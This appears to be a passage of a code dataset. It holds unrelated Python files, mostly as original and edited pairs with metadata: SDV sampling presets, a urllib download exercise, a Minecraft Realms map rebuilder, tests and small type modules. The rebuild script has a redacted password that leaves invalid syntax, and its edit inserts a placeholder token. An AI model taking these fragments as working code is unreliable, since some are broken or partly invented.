            num_rows, randomize_samples, batch_size, output_file_path, conditions)
        return self._postprocess_sampled(sampled)

    def sample_conditions(self, conditions, max_tries=100, batch_size_per_try=None,
                          randomize_samples=True, output_file_path=None):
        """Sample rows from this table with the given conditions.

        Args:
            conditions (list[sdv.sampling.Condition]):
                A list of sdv.sampling.Condition objects, which specify the column
                values in a condition, along with the number of rows for that
                condition.
            max_tries (int):
                Number of times to try sampling discarded rows. Defaults to 100.
            batch_size_per_try (int):
                The batch size to use per attempt at sampling. Defaults to 10 times
                the number of rows.
            randomize_samples (bool):
                Whether or not to use a fixed seed when sampling. Defaults
                to True.
            output_file_path (str or None):
                The file to periodically write sampled rows to. Defaults to
                a temporary file, if None.

        Returns:
            pandas.DataFrame:
                Sampled data.
        """
        # GaussianCopula takes keyword-only sampling options and no max_tries.
        if isinstance(self._model, GaussianCopula):
            sampled = self._model.sample_conditions(
                conditions,
                batch_size=batch_size_per_try,
                randomize_samples=randomize_samples,
                output_file_path=output_file_path,
            )
        else:
            sampled = self._model.sample_conditions(
                conditions, max_tries, batch_size_per_try, randomize_samples, output_file_path)

        return self._postprocess_sampled(sampled)

    def sample_remaining_columns(self, known_columns, max_tries=100, batch_size_per_try=None,
                                 randomize_samples=True, output_file_path=None):
        """Sample rows from this table.

        Args:
            known_columns (pandas.DataFrame):
                A pandas.DataFrame with the columns that are already known. The output
                is a DataFrame such that each row in the output is sampled
                conditionally on the corresponding row in the input.
            max_tries (int):
                Number of times to try sampling discarded rows. Defaults to 100.
            batch_size_per_try (int):
                The batch size to use per attempt at sampling. Defaults to 10 times
                the number of rows.
            randomize_samples (bool):
                Whether or not to use a fixed seed when sampling. Defaults
                to True.
            output_file_path (str or None):
                The file to periodically write sampled rows to. Defaults to
                a temporary file, if None.

        Returns:
            pandas.DataFrame:
                Sampled data.
        """
        # GaussianCopula takes keyword-only sampling options and no max_tries.
        if isinstance(self._model, GaussianCopula):
            sampled = self._model.sample_remaining_columns(
                known_columns,
                batch_size=batch_size_per_try,
                randomize_samples=randomize_samples,
                output_file_path=output_file_path,
            )
        else:
            sampled = self._model.sample_remaining_columns(
                known_columns, max_tries, batch_size_per_try, randomize_samples, output_file_path)

        return self._postprocess_sampled(sampled)

    def save(self, path):
        """Save this model instance to the given path using pickle.

        Args:
            path (str):
                Path where the SDV instance will be serialized.
        """
        # Record package versions so ``load`` can warn on mismatches.
        self._package_versions = get_package_versions(getattr(self, '_model', None))

        with open(path, 'wb') as output:
            pickle.dump(self, output)

    @classmethod
    def load(cls, path):
        """Load a TabularModel instance from a given path.

        Args:
            path (str):
                Path from which to load the instance.

        Returns:
            TabularModel:
                The loaded tabular model.
        """
        with open(path, 'rb') as f:
            model = pickle.load(f)
            throw_version_mismatch_warning(getattr(model, '_package_versions', None))
            return model

    @classmethod
    def list_available_presets(cls, out=sys.stdout):
        """List the available presets and their descriptions."""
        # Fixed typo in the user-facing text: "learn more an" -> "learn more about an".
        out.write(f'Available presets:\n{PRESETS}\n\n'
                  'Supply the desired preset using the `name` parameter.\n\n'
                  'Have any requests for custom presets? Contact the SDV team to learn '
                  'more about an SDV Premium license.\n')

    def __repr__(self):
        """Represent tabular preset instance as text.

        Returns:
            str
        """
        return f'TabularPreset(name={self.name})'
|
en
| 0.749241
|
Base class for tabular model presets. Class for all tabular model presets. Args: name (str): The preset to use. metadata (dict or metadata.Table): Table metadata instance or dict representation. constraints (list[Constraint, dict]): List of Constraint objects or dicts. # Decide if transformers should model the null column or not. # If transformers should model the null column, pass None to let each transformer # decide if it's necessary or not. Fit this model to the data. Args: data (pandas.DataFrame): Data to fit the model to. # Store null percentage for future reference. Postprocess the sampled data. Add null values back based on null percentages captured in the fitting process. Args: sampled (pandas.DataFrame): The sampled data to postprocess. Returns: pandas.DataFrame Sample rows from this table. Args: num_rows (int): Number of rows to sample. This parameter is required. randomize_samples (bool): Whether or not to use a fixed seed when sampling. Defaults to True. batch_size (int or None): The batch size to sample. Defaults to `num_rows`, if None. output_file_path (str or None): The file to periodically write sampled rows to. If None, does not write rows anywhere. conditions: Deprecated argument. Use the `sample_conditions` method with `sdv.sampling.Condition` objects instead. Returns: pandas.DataFrame: Sampled data. Sample rows from this table with the given conditions. Args: conditions (list[sdv.sampling.Condition]): A list of sdv.sampling.Condition objects, which specify the column values in a condition, along with the number of rows for that condition. max_tries (int): Number of times to try sampling discarded rows. Defaults to 100. batch_size_per_try (int): The batch size to use per attempt at sampling. Defaults to 10 times the number of rows. randomize_samples (bool): Whether or not to use a fixed seed when sampling. Defaults to True. output_file_path (str or None): The file to periodically write sampled rows to. Defaults to a temporary file, if None. 
Returns: pandas.DataFrame: Sampled data. Sample rows from this table. Args: known_columns (pandas.DataFrame): A pandas.DataFrame with the columns that are already known. The output is a DataFrame such that each row in the output is sampled conditionally on the corresponding row in the input. max_tries (int): Number of times to try sampling discarded rows. Defaults to 100. batch_size_per_try (int): The batch size to use per attempt at sampling. Defaults to 10 times the number of rows. randomize_samples (bool): Whether or not to use a fixed seed when sampling. Defaults to True. output_file_path (str or None): The file to periodically write sampled rows to. Defaults to a temporary file, if None. Returns: pandas.DataFrame: Sampled data. Save this model instance to the given path using pickle. Args: path (str): Path where the SDV instance will be serialized. Load a TabularModel instance from a given path. Args: path (str): Path from which to load the instance. Returns: TabularModel: The loaded tabular model. List the available presets and their descriptions. Represent tabular preset instance as text. Returns: str
| 2.372908
| 2
|
online/section02-2.py
|
djangojeng-e/Web-Crawling
| 0
|
6627575
|
# Section02-2
# Python web-crawling basics
# Basic usage of the urlopen function
import urllib.request as req
from urllib.error import URLError, HTTPError

# Local paths / file names for the downloads
path_list = ["test1.jpg", "index.html"]

# URLs of the resources to download
target_url = ["http://post.phinf.naver.net/MjAxOTA2MDdfMTU0/MDAxNTU5ODcxODc3NTU0.4SFrd6PeWF62ewm21H4nu5xae67wvpvVe2VjagQzilcg.iYBSJe5CZ3E_j2wBY5dlWaLHyS2YujdK0ooqPOOvFNkg.JPEG/ILFVJ_GQGHr0HniSIzDBBbUbrjpg.jpg", "http://google.com"]

for i, url in enumerate(target_url):
    # Exception handling around the network call
    try:
        # Fix: the original never closed the response; the context manager
        # guarantees the underlying socket is released even if read() fails.
        with req.urlopen(url) as response:
            # Response body
            contents = response.read()
        print("----------------------------")
    except HTTPError as e:
        print("Download failed.")
        print("HTTPError code : ", e.code)
    except URLError as e:
        print("Download failed.")
        print("URL Error Reason: ", e.reason)
    # Success path
    else:
        print()
        print("Download Succeeded.")
        # Print intermediate status information (headers remain readable
        # after the response is closed).
        print('Header Info- {} : {}'.format(i, response.info()))
        print('HTTP Status Code: {}'.format(response.getcode()))
        print()
        with open(path_list[i], 'wb') as c:
            c.write(contents)
        print("----------------------------")
|
# Section02-2
# Python web-crawling basics
# Basic usage of the urlopen function
import urllib.request as req
from urllib.error import URLError, HTTPError
# Local paths / file names for the downloads
path_list = ["test1.jpg", "index.html"]
# URLs of the resources to download
target_url = ["http://post.phinf.naver.net/MjAxOTA2MDdfMTU0/MDAxNTU5ODcxODc3NTU0.4SFrd6PeWF62ewm21H4nu5xae67wvpvVe2VjagQzilcg.iYBSJe5CZ3E_j2wBY5dlWaLHyS2YujdK0ooqPOOvFNkg.JPEG/ILFVJ_GQGHr0HniSIzDBBbUbrjpg.jpg", "http://google.com"]
for i, url in enumerate(target_url):
    # Exception handling around the network call
    try:
        # Read the response from the web server
        # NOTE(review): the response is never closed; consider a with-statement.
        response = req.urlopen(url)
        # Response body
        contents = response.read()
        print("----------------------------")
    except HTTPError as e:
        print("Download failed.")
        print("HTTPError code : ", e.code)
    except URLError as e:
        print("Download failed.")
        print("URL Error Reason: ", e.reason)
    # Success path
    else:
        print()
        print("Download Succeeded.")
        # Print intermediate status information
        print('Header Info- {} : {}'.format(i, response.info()))
        print('HTTP Status Code: {}'.format(response.getcode()))
        print()
        with open(path_list[i], 'wb') as c:
            c.write(contents)
        print("----------------------------")
|
ko
| 1.000069
|
# Section02-2 # 파이썬 크롤링 기초 # URLOPEN 함수 기초 사용법 # 다운로드 경로 및 파일명 # 다운로드 리소스 url # ㅇㅖ외처리 # 웹 수신 정보 읽기 # 수신 내용 #성공 # 상태 정보 중간 출력
| 3.217454
| 3
|
src/rebuild.py
|
KrusnikViers/MineMap
| 5
|
6627576
|
<filename>src/rebuild.py
#!/usr/bin/python3
import json
import os
import shutil
import subprocess
import time
import requests
from settings import MINECRAFT_TEXTURES_PATH, WORLD_BACKUP_PATH, LOG_FILE_PATH, RENDER_CONFIGURATION_FILE_PATH
class RebuildException(Exception):
    """Raised for any unrecoverable failure during a map rebuild."""
    pass
def _retry_on_timeout(lambda_f):
timeout_minutes = 15
while True:
try:
return lambda_f()
except requests.exceptions.Timeout as e:
print('Timeout is reached during network call; retrying in {} minutes...'.format(timeout_minutes))
time.sleep(timeout_minutes * 60)
def _download_to_file(url: str, location: str):
    """Stream the resource at *url* into the file at *location*.

    Missing parent directories are created; a non-200 HTTP status raises
    RebuildException.
    """
    os.makedirs(os.path.dirname(location), exist_ok=True)
    response = _retry_on_timeout(lambda: requests.get(url, stream=True, timeout=60))
    if response.status_code != 200:
        message = 'Download from {} to {} failed: {}'.format(url, location, str(response))
        raise RebuildException(message)
    # Let requests transparently decompress gzip/deflate payloads while copying.
    response.raw.decode_content = True
    with open(location, 'wb') as output_file:
        shutil.copyfileobj(response.raw, output_file)
    print('Download complete: {} to {}'.format(url, location))
def _get_json(url: str, post_body=None, cookies=None):
    """Fetch *url* (POST when *post_body* is given, GET otherwise) and return
    the decoded JSON payload.

    Raises RebuildException when the response body is not valid JSON.
    """
    if post_body:
        reply = _retry_on_timeout(lambda: requests.post(url, post_body, cookies=cookies, timeout=60))
    else:
        reply = _retry_on_timeout(lambda: requests.get(url, cookies=cookies, timeout=60))
    try:
        return json.loads(reply.text)
    except json.decoder.JSONDecodeError:
        raise RebuildException('Bad response from {}: {}'.format(url, reply.text))
# Execute sequence of shell commands, stops and raises exception, if one of them returned non-zero result.
def _execute_sequence(commands):
for command in commands:
if subprocess.run(command, shell=True).returncode != 0:
raise RebuildException('Shell command failed: {}'.format(command))
# Class for rebuilding a Minecraft map using the minecraft-overviewer. It is caching some data between rebuilds, so it
# is recommended to use the same instance for multiple map renderings.
class OverviewerMapBuilder:
    """Rebuilds a Minecraft Realms map using minecraft-overviewer.

    The current client version and the auth cookies are cached between
    rebuilds, so the same instance should be reused for multiple renderings.
    """

    def __init__(self, configuration):
        # Mojang account credentials plus the display name of the target realm.
        self.email = configuration['email']
        self.password = configuration['password']
        self.realm_name = configuration['realm_name']
        # Lazily populated caches, reused across rebuild() calls.
        self.current_client = None
        self.authorised_cookies = None

    @staticmethod
    def _get_latest_version_id() -> str:
        """Return the id of the latest Minecraft release."""
        version_data = _get_json('https://launchermeta.mojang.com/mc/game/version_manifest.json')
        return version_data['latest']['release']

    def _update_current_client(self, client_id):
        """Download the texture pack for *client_id* and remember the version."""
        # Remove old clients, if any.
        _execute_sequence(['rm -f {}'.format(MINECRAFT_TEXTURES_PATH)])
        _download_to_file('https://overviewer.org/textures/{}'.format(client_id), MINECRAFT_TEXTURES_PATH)
        self.current_client = client_id

    def _update_authorised_cookies(self):
        """Authenticate against Mojang and cache the realms session cookies."""
        request_body = {
            'username': self.email,
            # Fix: the credential here had been redacted to a bare `<PASSWORD>`
            # placeholder, which is a syntax error. The account password stored
            # in __init__ is what the auth endpoint expects.
            'password': self.password,
            'agent': {'name': 'Minecraft', 'version': 1},
            # NOTE(review): the original client token value was redacted; this
            # literal is a placeholder — confirm what value the deployment used.
            'clientToken': '<PASSWORD>'
        }
        auth_data = _get_json('https://authserver.mojang.com/authenticate', post_body=json.dumps(request_body))
        if 'accessToken' not in auth_data or 'selectedProfile' not in auth_data:
            raise RebuildException('Bad auth response: {}'.format(auth_data))
        self.authorised_cookies = {
            'sid': 'token:{}:{}'.format(auth_data['accessToken'], auth_data['selectedProfile']['id']),
            'user': auth_data['selectedProfile']['name'],
            'version': self.current_client,
        }

    def _get_world_id(self):
        """Return the realm id whose name matches ``self.realm_name``."""
        realms_list = _get_json('https://pc.realms.minecraft.net/worlds', cookies=self.authorised_cookies)
        if 'servers' not in realms_list or len(realms_list['servers']) == 0:
            raise RebuildException('Bad realms list: {}'.format(realms_list))
        # Look for the world id among the realms
        for server in realms_list['servers']:
            if server['name'] == self.realm_name:
                return server['id']
        raise RebuildException('Realm \'{}\' was not found: {}'.format(self.realm_name, realms_list['servers']))

    def _get_world_download_link(self, world_id: str):
        """Return a download URL for the latest backup of *world_id*.

        The realms API occasionally answers 'Retry again later'; a single
        retry is attempted after a short delay in that case.
        """
        try:
            backup_metadata = _get_json(
                'https://pc.realms.minecraft.net/worlds/{}/slot/1/download'.format(world_id),
                cookies=self.authorised_cookies)
        except RebuildException as exc:
            if 'Retry again later' in str(exc):
                print('Should retry again later, waiting 15s...')
                time.sleep(15)
                backup_metadata = _get_json(
                    'https://pc.realms.minecraft.net/worlds/{}/slot/1/download'.format(world_id),
                    cookies=self.authorised_cookies)
            else:
                raise exc
        if 'downloadLink' not in backup_metadata:
            raise RebuildException('Bad backup metadata: {}'.format(backup_metadata))
        return backup_metadata['downloadLink']

    @staticmethod
    def _prepare_world_backup(download_link: str):
        """Download the world backup and unpack it under /build."""
        _download_to_file(download_link, WORLD_BACKUP_PATH)
        _execute_sequence([
            'gunzip -c /build/world.tar.gz > /build/world.tar',
            'tar -xvf /build/world.tar -C /build/'
        ])

    @staticmethod
    def _rebuild_map():
        """Render map tiles and POI markers, then delete the unpacked world."""
        _execute_sequence([
            '/overviewer/overviewer.py --config={0} >> {1}'.format(RENDER_CONFIGURATION_FILE_PATH, LOG_FILE_PATH),
            '/overviewer/overviewer.py --config={0} --genpoi >> {1}'.format(RENDER_CONFIGURATION_FILE_PATH,
                                                                            LOG_FILE_PATH),
            'rm -rf /build/world*'
        ])

    def rebuild(self):
        """Run a full rebuild: refresh client/auth as needed, download, render."""
        print('Requesting current client version...')
        current_client_version = self._get_latest_version_id()
        if self.current_client != current_client_version:
            print('Updating current client...')
            self._update_current_client(current_client_version)
        backup_link = None
        # Try to use previous token:
        if self.authorised_cookies:
            try:
                print('Requesting backup link with previous token...')
                backup_link = self._get_world_download_link(self._get_world_id())
            except RebuildException:
                pass
        if not backup_link:
            print('Updating token...')
            self._update_authorised_cookies()
            print('Requesting backup link...')
            backup_link = self._get_world_download_link(self._get_world_id())
        print('Downloading and unpacking the world...')
        self._prepare_world_backup(backup_link)
        print('Rendering...')
        self._rebuild_map()
|
<filename>src/rebuild.py
#!/usr/bin/python3
import json
import os
import shutil
import subprocess
import time
import requests
from settings import MINECRAFT_TEXTURES_PATH, WORLD_BACKUP_PATH, LOG_FILE_PATH, RENDER_CONFIGURATION_FILE_PATH
class RebuildException(Exception):
    """Raised for any unrecoverable failure during a map rebuild."""
    pass


def _retry_on_timeout(lambda_f):
    """Call *lambda_f* until it completes without a requests timeout.

    Retries indefinitely, sleeping a fixed 15 minutes between attempts;
    non-timeout exceptions propagate to the caller.
    """
    timeout_minutes = 15
    while True:
        try:
            return lambda_f()
        except requests.exceptions.Timeout as e:
            print('Timeout is reached during network call; retrying in {} minutes...'.format(timeout_minutes))
            time.sleep(timeout_minutes * 60)


# Download file from |url| to |location|
def _download_to_file(url: str, location: str):
    """Stream the resource at *url* into the file at *location*.

    Missing parent directories are created; a non-200 HTTP status raises
    RebuildException.
    """
    os.makedirs(os.path.dirname(location), exist_ok=True)
    download_request = _retry_on_timeout(lambda: requests.get(url, stream=True, timeout=60))
    if download_request.status_code != 200:
        raise RebuildException('Download from {} to {} failed: {}'.format(url, location, str(download_request)))
    with open(location, 'wb') as output_file:
        # Let requests transparently decompress gzip/deflate payloads.
        download_request.raw.decode_content = True
        shutil.copyfileobj(download_request.raw, output_file)
    print('Download complete: {} to {}'.format(url, location))


# GET or POST request on specified url, expects JSON as an answer.
def _get_json(url: str, post_body=None, cookies=None):
    """Fetch *url* (POST when *post_body* is given) and return parsed JSON.

    Raises RebuildException when the response body is not valid JSON.
    """
    if post_body:
        current_request = _retry_on_timeout(lambda: requests.post(url, post_body, cookies=cookies, timeout=60))
    else:
        current_request = _retry_on_timeout(lambda: requests.get(url, cookies=cookies, timeout=60))
    try:
        return json.loads(current_request.text)
    except json.decoder.JSONDecodeError:
        raise RebuildException('Bad response from {}: {}'.format(url, current_request.text))


# Execute sequence of shell commands, stops and raises exception, if one of them returned non-zero result.
def _execute_sequence(commands):
    """Run each shell command in order; raise on the first non-zero exit."""
    for command in commands:
        if subprocess.run(command, shell=True).returncode != 0:
            raise RebuildException('Shell command failed: {}'.format(command))
# Class for rebuilding a Minecraft map using the minecraft-overviewer. It is caching some data between rebuilds, so it
# is recommended to use the same instance for multiple map renderings.
class OverviewerMapBuilder:
def __init__(self, configuration):
self.email = configuration['email']
self.password = configuration['password']
self.realm_name = configuration['realm_name']
self.current_client = None
self.authorised_cookies = None
@staticmethod
def _get_latest_version_id() -> str:
version_data = _get_json('https://launchermeta.mojang.com/mc/game/version_manifest.json')
return version_data['latest']['release']
def _update_current_client(self, client_id):
# Remove old clients, if any.
_execute_sequence(['rm -f {}'.format(MINECRAFT_TEXTURES_PATH)])
_download_to_file('https://overviewer.org/textures/{}'.format(client_id), MINECRAFT_TEXTURES_PATH)
self.current_client = client_id
def _update_authorised_cookies(self):
request_body = {
'username': self.email,
'password': <PASSWORD>,
'agent': {'name': 'Minecraft', 'version': 1},
'clientToken': '<PASSWORD>'
}
auth_data = _get_json('https://authserver.mojang.com/authenticate', post_body=json.dumps(request_body))
if 'accessToken' not in auth_data or 'selectedProfile' not in auth_data:
raise RebuildException('Bad auth response: {}'.format(auth_data))
self.authorised_cookies = {
'sid': 'token:{}:{}'.format(auth_data['accessToken'], auth_data['selectedProfile']['id']),
'user': auth_data['selectedProfile']['name'],
'version': self.current_client,
}
def _get_world_id(self):
realms_list = _get_json('https://pc.realms.minecraft.net/worlds', cookies=self.authorised_cookies)
if 'servers' not in realms_list or len(realms_list['servers']) == 0:
raise RebuildException('Bad realms list: {}'.format(realms_list))
# Look for the world id among the realms
for server in realms_list['servers']:
if server['name'] == self.realm_name:
return server['id']
raise RebuildException('Realm \'{}\' was not found: {}'.format(self.realm_name, realms_list['servers']))
def _get_world_download_link(self, world_id: str):
try:
backup_metadata = _get_json(
'https://pc.realms.minecraft.net/worlds/{}/slot/1/download'.format(world_id),
cookies=self.authorised_cookies)
except RebuildException as exc:
if 'Retry again later' in str(exc):
print('Should retry again later, waiting 15s...')
time.sleep(15)
backup_metadata = _get_json(
'https://pc.realms.minecraft.net/worlds/{}/slot/1/download'.format(world_id),
cookies=self.authorised_cookies)
else:
raise exc
if 'downloadLink' not in backup_metadata:
raise RebuildException('Bad backup metadata: {}'.format(backup_metadata))
return backup_metadata['downloadLink']
@staticmethod
def _prepare_world_backup(download_link: str):
_download_to_file(download_link, WORLD_BACKUP_PATH)
_execute_sequence([
'gunzip -c /build/world.tar.gz > /build/world.tar',
'tar -xvf /build/world.tar -C /build/'
])
@staticmethod
def _rebuild_map():
_execute_sequence([
'/overviewer/overviewer.py --config={0} >> {1}'.format(RENDER_CONFIGURATION_FILE_PATH, LOG_FILE_PATH),
'/overviewer/overviewer.py --config={0} --genpoi >> {1}'.format(RENDER_CONFIGURATION_FILE_PATH,
LOG_FILE_PATH),
'rm -rf /build/world*'
])
def rebuild(self):
print('Requesting current client version...')
current_client_version = self._get_latest_version_id()
if self.current_client != current_client_version:
print('Updating current client...')
self._update_current_client(current_client_version)
backup_link = None
# Try to use previous token:
if self.authorised_cookies:
try:
print('Requesting backup link with previous token...')
backup_link = self._get_world_download_link(self._get_world_id())
except RebuildException:
pass
if not backup_link:
print('Updating token...')
self._update_authorised_cookies()
print('Requesting backup link...')
backup_link = self._get_world_download_link(self._get_world_id())
print('Downloading and unpacking the world...')
self._prepare_world_backup(backup_link)
print('Rendering...')
self._rebuild_map()
|
en
| 0.841845
|
#!/usr/bin/python3 # Download file from |url| to |location| # GET or POST request on specified url, expects JSON as an answer. # Execute sequence of shell commands, stops and raises exception, if one of them returned non-zero result. # Class for rebuilding a Minecraft map using the minecraft-overviewer. It is caching some data between rebuilds, so it # is recommended to use the same instance for multiple map renderings. # Remove old clients, if any. # Look for the world id among the realms # Try to use previous token:
| 2.642788
| 3
|
togglws/values.py
|
champion-automatica/toggl_webhooks
| 10
|
6627577
|
# Possible actions returned by the Toggl server
A_INSERT = 'INSERT'
A_UPDATE = 'UPDATE'
A_DELETE = 'DELETE'
# Possible models returned by the Toggl server
M_TIME_ENTRY = 'time_entry'
M_PROJECT = 'project'
M_TASK = 'task'
M_CLIENT = 'client'
M_TAG = 'tag'
|
# Possible actions returned by the Toggl server
A_INSERT = 'INSERT'
A_UPDATE = 'UPDATE'
A_DELETE = 'DELETE'
# Possible models returned by the Toggl server
M_TIME_ENTRY = 'time_entry'
M_PROJECT = 'project'
M_TASK = 'task'
M_CLIENT = 'client'
M_TAG = 'tag'
|
en
| 0.90832
|
# Possible actions returned by the Toggl server # Possible models returned by the Toggl server
| 1.121084
| 1
|
tests/src/year2021/test_day14b.py
|
lancelote/advent_of_code
| 10
|
6627578
|
"""2021 - Day 14 Part 2: Extended Polymerization."""
from textwrap import dedent
from src.year2021.day14b import solve
def test_solve():
task = dedent(
"""
NNCB
CH -> B
HH -> N
CB -> H
NH -> C
HB -> C
HC -> B
HN -> C
NN -> C
BH -> H
NC -> B
NB -> B
BN -> B
BB -> N
BC -> B
CC -> N
CN -> C
"""
).strip()
assert solve(task) == 2188189693529
|
"""2021 - Day 14 Part 2: Extended Polymerization."""
from textwrap import dedent
from src.year2021.day14b import solve
def test_solve():
task = dedent(
"""
NNCB
CH -> B
HH -> N
CB -> H
NH -> C
HB -> C
HC -> B
HN -> C
NN -> C
BH -> H
NC -> B
NB -> B
BN -> B
BB -> N
BC -> B
CC -> N
CN -> C
"""
).strip()
assert solve(task) == 2188189693529
|
en
| 0.525638
|
2021 - Day 14 Part 2: Extended Polymerization. NNCB CH -> B HH -> N CB -> H NH -> C HB -> C HC -> B HN -> C NN -> C BH -> H NC -> B NB -> B BN -> B BB -> N BC -> B CC -> N CN -> C
| 2.496816
| 2
|
open_spiel/python/games/iterated_prisoners_dilemma_test.py
|
xiaohangt/open_spiel
| 0
|
6627579
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for iterated_prisoners_dilemma.py."""
from absl.testing import absltest
from open_spiel.python.games import iterated_prisoners_dilemma # pylint: disable=unused-import
import pyspiel
class IteratedPrisonersDilemmaTest(absltest.TestCase):
def test_game_as_turn_based(self):
"""Check the game can be converted to a turn-based game."""
game = pyspiel.load_game("python_iterated_prisoners_dilemma")
turn_based = pyspiel.convert_to_turn_based(game)
pyspiel.random_sim_test(
turn_based, num_sims=10, serialize=False, verbose=True)
def test_game_as_turn_based_via_string(self):
"""Check the game can be created as a turn-based game from a string."""
game = pyspiel.load_game(
"turn_based_simultaneous_game(game=python_iterated_prisoners_dilemma())"
)
pyspiel.random_sim_test(
game, num_sims=10, serialize=False, verbose=True)
def test_game_from_cc(self):
"""Runs our standard game tests, checking API consistency."""
game = pyspiel.load_game("python_iterated_prisoners_dilemma")
pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)
if __name__ == "__main__":
absltest.main()
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for iterated_prisoners_dilemma.py."""
from absl.testing import absltest
from open_spiel.python.games import iterated_prisoners_dilemma # pylint: disable=unused-import
import pyspiel
class IteratedPrisonersDilemmaTest(absltest.TestCase):
def test_game_as_turn_based(self):
"""Check the game can be converted to a turn-based game."""
game = pyspiel.load_game("python_iterated_prisoners_dilemma")
turn_based = pyspiel.convert_to_turn_based(game)
pyspiel.random_sim_test(
turn_based, num_sims=10, serialize=False, verbose=True)
def test_game_as_turn_based_via_string(self):
"""Check the game can be created as a turn-based game from a string."""
game = pyspiel.load_game(
"turn_based_simultaneous_game(game=python_iterated_prisoners_dilemma())"
)
pyspiel.random_sim_test(
game, num_sims=10, serialize=False, verbose=True)
def test_game_from_cc(self):
"""Runs our standard game tests, checking API consistency."""
game = pyspiel.load_game("python_iterated_prisoners_dilemma")
pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)
if __name__ == "__main__":
absltest.main()
|
en
| 0.863941
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Tests for iterated_prisoners_dilemma.py. # pylint: disable=unused-import Check the game can be converted to a turn-based game. Check the game can be created as a turn-based game from a string. Runs our standard game tests, checking API consistency.
| 2.543876
| 3
|
Task/Shell-one-liner/Python/shell-one-liner-2.py
|
LaudateCorpus1/RosettaCodeData
| 1
|
6627580
|
python -m CGIHTTPServer
|
python -m CGIHTTPServer
|
none
| 1
| 1.087753
| 1
|
|
viberio/types/messages/message.py
|
bostud/Viber_bot
| 0
|
6627581
|
import attr
from viberio.types.base import ViberBaseObject
@attr.s
class Message(ViberBaseObject):
tracking_data: str = attr.ib(default=None)
keyboard: str = attr.ib(default=None)
min_api_version: str = attr.ib(default=None)
alt_text: str = attr.ib(default=None)
@attr.s
class TypedMessage(Message):
def __init__(self):
self.text = None
type: str = attr.ib(default=None)
|
import attr
from viberio.types.base import ViberBaseObject
@attr.s
class Message(ViberBaseObject):
tracking_data: str = attr.ib(default=None)
keyboard: str = attr.ib(default=None)
min_api_version: str = attr.ib(default=None)
alt_text: str = attr.ib(default=None)
@attr.s
class TypedMessage(Message):
def __init__(self):
self.text = None
type: str = attr.ib(default=None)
|
none
| 1
| 2.361694
| 2
|
|
sdc/rewrites/read_csv_consts.py
|
Vyacheslav-Smirnov/hpat
| 0
|
6627582
|
# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
from numba.core.rewrites import register_rewrite, Rewrite
from numba.core.ir_utils import find_callname, guard, mk_unique_var
from numba import errors
from numba.core import ir
from numba.core import consts
from sdc.rewrites.ir_utils import remove_unused_recursively, make_assign, find_operations
def find_build_sequence(func_ir, var):
"""Reimplemented from numba.core.ir_utils.find_build_sequence
Added 'build_map' to build_ops list.
"""
from numba.core.ir_utils import (require, get_definition)
require(isinstance(var, ir.Var))
var_def = get_definition(func_ir, var)
require(isinstance(var_def, ir.Expr))
build_ops = ['build_tuple', 'build_list', 'build_set', 'build_map']
require(var_def.op in build_ops)
return var_def.items, var_def.op
class ConstantInference(consts.ConstantInference):
def _infer_expr(self, expr):
if expr.op == 'build_map':
def inf_const(value):
return self.infer_constant(value.name, loc=expr.loc)
return {inf_const(k): inf_const(v) for k, v in expr.items}
return super()._infer_expr(expr)
@register_rewrite('before-inference')
class RewriteReadCsv(Rewrite):
"""
Searches for calls of pandas.read_csv() and replace it with calls of read_csv.
"""
_pandas_read_csv_calls = [
('read_csv', 'pandas'), # for calls like pandas.read_csv()
('read_csv', 'pandas.io.parsers'), # for calls like read_csv = pandas.read_csv, read_csv()
]
_read_csv_const_args = ('names', 'dtype', 'usecols')
def match(self, func_ir, block, typemap, calltypes):
# TODO: 1. save instructions of build_map, build_list for read_csv params
# 2. check that vars are used only in read_csv
# 3. replace vars with build_tuple inplace
